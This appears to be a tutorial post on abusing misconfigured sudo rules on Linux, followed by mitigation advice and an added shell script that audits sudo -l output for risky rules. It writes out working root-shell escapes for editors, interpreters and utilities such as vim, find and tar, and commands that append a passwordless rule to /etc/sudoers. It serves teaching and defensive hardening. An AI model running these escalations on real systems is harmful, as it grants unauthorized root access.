Abusing Sudo Binaries
Abusing Sudo Binaries is a well-known privilege escalation technique on Linux systems. It exploits misconfigurations in the sudo command that allow a user with limited privileges to execute specific binaries as a higher-privileged user, typically root. If such binaries are not properly restricted, they can be leveraged to gain unauthorized access or escalate privileges.
This technique is often used in post-exploitation scenarios, where an attacker who already has limited access to a system attempts to escalate privileges and gain full control.
Detailed Workflow
1. Enumerating Sudo Permissions
The first step is to determine which binaries the user can execute with sudo. Use the following command:
sudo -l
Example Output:
User amr may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/vim
(ALL) NOPASSWD: /usr/bin/python3
(ALL) NOPASSWD: /usr/bin/awk
Key Points:
- NOPASSWD: No password is required to execute the command.
- (ALL): The command can be run as any user, including root.
2. Exploiting the Allowed Binaries
Certain binaries allow you to execute commands, spawn a shell, or modify system files. Here are some examples:
Examples of Exploitable Binaries
Interactive Shells
Some binaries allow you to directly spawn a shell.
- bash:
sudo bash
- sh:
sudo sh
Text Editors
Many text editors have built-in commands to execute shell commands.
- vim:
sudo vim -c ':!bash'
- nano:
In nano, press Ctrl+R (Read File) followed by Ctrl+X (Execute Command) to execute commands:
sudo nano
Then type:
!/bin/bash
- less:
sudo less /etc/hosts
Press ! and type:
bash
Scripting Languages
Scripting languages like Python, Perl, and Ruby can execute system commands.
- Python:
sudo python -c 'import os; os.system("/bin/bash")'
- Perl:
sudo perl -e 'exec "/bin/bash";'
- Ruby:
sudo ruby -e 'exec "/bin/bash";'
System Utilities
Some utilities allow command execution or file manipulation.
- awk:
sudo awk 'BEGIN {system("/bin/bash")}'
- find:
sudo find / -exec /bin/bash \;
- tar:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
- zip:
sudo zip exploit.zip /tmp -T --unzip-command="sh -c /bin/bash"
Exploiting File Access
If a binary allows editing system-critical files, it can be used to escalate privileges.
- echo:
sudo echo "amr ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Note that the >> redirection is performed by the caller's own unprivileged shell before sudo runs, so this variant fails with a permission error; only the command itself (echo) is elevated. The tee form below works because the write to the file is done by the elevated process, which is why tee is a binary to watch for.
- tee:
echo "amr ALL=(ALL) NOPASSWD:ALL" | sudo tee -a /etc/sudoers
Using GTFOBins for Exploitation
The GTFOBins database is an excellent resource to identify exploitable binaries. It provides ready-to-use commands for privilege escalation based on the binary’s functionality.
Steps:
- Visit the GTFOBins website.
- Search for the binary listed in the sudo -l output.
- Follow the provided exploitation commands.
Real-World Scenarios
Scenario 1: Exploiting vim
A user has sudo permissions for /usr/bin/vim:
sudo vim -c ':!bash'
This spawns a root shell.
Scenario 2: Exploiting find
A user can run find with sudo:
sudo find / -exec /bin/bash \;
This command uses the -exec action of find to execute a root shell.
Scenario 3: Editing Sensitive Files
If sudo tee is allowed:
echo "amr ALL=(ALL) NOPASSWD:ALL" | sudo tee -a /etc/sudoers
This grants the user full sudo privileges.
Mitigation Strategies
Limit Sudo Permissions
- Avoid using ALL or NOPASSWD for binaries unless absolutely necessary.
- Only allow specific, non-exploitable commands, with fixed arguments where possible, and avoid granting binaries that can spawn a shell or write arbitrary files as root.
Use NOEXEC
Prevent certain binaries from spawning subshells by enabling noexec for them in the sudoers configuration:
Defaults!/usr/bin/vim noexec
Note that noexec works by preloading a library into dynamically linked programs to block their exec calls; it does not restrict what the allowed binary can do by itself, so an editor run under noexec can still write to /etc/sudoers or /etc/passwd as root. Treat it as a complement to restricting which binaries are allowed, not a substitute.
Audit Sudo Configurations
Regularly review the /etc/sudoers
file and related configurations to identify and remove unnecessary permissions.
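The following script, added here and not part of the original post, automates one pass of such a review: it parses saved sudo -l output and flags rules that grant ALL, carry NOPASSWD, run as any user, or point at one of the shell-escape-capable binaries this post lists. The RISKY_BINS list and the SAMPLE output are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post: flag risky rules in saved `sudo -l` output.
# RISKY_BINS is a constructed list of the shell-escape-capable binaries discussed on this page.
RISKY_BINS="bash sh vim nano less python python3 perl ruby awk find tar zip tee"

# Constructed sample `sudo -l` output, modelled on the example earlier in the post.
SAMPLE='User amr may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
    (ALL) NOEXEC: /usr/bin/less'

# audit_sudo_l: read `sudo -l` output on stdin and print one RISK line per risky rule.
# Rule lines look like "(runas) TAG: TAG: command args"; every other line is skipped.
audit_sudo_l() {
    awk -v risky="$RISKY_BINS" '
    /^[[:space:]]*\(/ {
        line = $0; sub(/^[[:space:]]+/, "", line)
        runas = line; sub(/\).*/, "", runas); sub(/^\(/, "", runas)      # text inside ( )
        rest = line; sub(/^\([^)]*\)[[:space:]]*/, "", rest)             # tags + command
        tags = ""
        while (match(rest, /^[A-Z]+:[[:space:]]*/)) {                    # NOPASSWD:, SETENV:, NOEXEC: ...
            tags = tags substr(rest, 1, RLENGTH)
            rest = substr(rest, RLENGTH + 1)
        }
        bin = rest; sub(/[[:space:]].*/, "", bin); sub(/.*\//, "", bin)  # basename of the command
        f = ""
        if (rest == "ALL")     f = f " unrestricted-command"
        if (runas ~ /ALL/)     f = f " runas-any-user"
        if (tags ~ /NOPASSWD/) f = f " no-password"
        if (index(" " risky " ", " " bin " ")) {
            f = f " shell-escape:" bin
            if (tags ~ /NOEXEC/) f = f "(noexec-set,can-still-write-files)"
        }
        if (f != "") print "RISK:" f " :: " line
    }'
}

# count_findings: number of RISK lines for the `sudo -l` text passed as $1
count_findings() {
    printf '%s\n' "$1" | audit_sudo_l | grep -c '^RISK:'
}

printf '%s\n' "$SAMPLE" | audit_sudo_l
echo "risky rules: $(count_findings "$SAMPLE")"
```

Run it against the real output of sudo -l for each account you review; a rule with no RISK line still deserves a look if its arguments are not fixed.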
Enforce Principle of Least Privilege
Grant users the minimum privileges required to perform their tasks.
Monitor Sudo Usage
Use logging and monitoring tools to track sudo commands executed by users. sudo records every invocation (invoking user, target user, working directory and command) through syslog, typically to /var/log/auth.log or /var/log/secure; forward these records to a central log system and alert on invocations of shell-capable binaries and on any write to /etc/sudoers.
Conclusion
Abusing sudo binaries demonstrates the importance of secure configuration management and strict privilege control. By understanding how these techniques work and implementing proper mitigation strategies, system administrators can significantly reduce the risk of privilege escalation attacks.